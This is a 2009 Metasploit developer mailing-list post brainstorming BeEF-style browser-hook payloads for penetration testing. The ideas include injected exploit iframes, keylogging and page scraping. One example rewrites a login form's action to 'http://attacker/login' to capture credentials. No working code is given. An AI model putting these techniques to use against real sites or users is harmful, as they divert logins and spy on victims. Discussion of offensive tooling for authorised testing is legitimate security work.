I've thought several times how helpful it would be to hook with something similar to BeEF. Let you have multiple 'sessions' in the background that you could pipe varoius exploits/aux mods to. I really like the idea of BeEF, but haven't found it incredibly useful in realworld pentesting scenarios. I wrote some BeEF modules that would inject iframes pointed to msf / etc, but that was more of a novelty than anything else. (You can still do the same thing normally.)
Perhaps just creating a generic javascript/html 'exploit' that merely exposed a new set of BeEF-like payloads would work. The payload handlers would let you have dynamic control of various javascript functions that we could build to do things like: - iframe to existing exploits of your choosing - keylog - page scraping - find-and-replace kinds of things (like changing <FORM action="https://blah.com/login"; method="POST"> to <FORM action="http://attacker/login"; method="POST">) - custom javascript Any other ideas? On Tue, Feb 17, 2009 at 5:34 PM, Patrick Webster <patr...@aushack.com> wrote: > Anything specific in mind? >:) > > -Patrick > _______________________________________________ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers > _______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
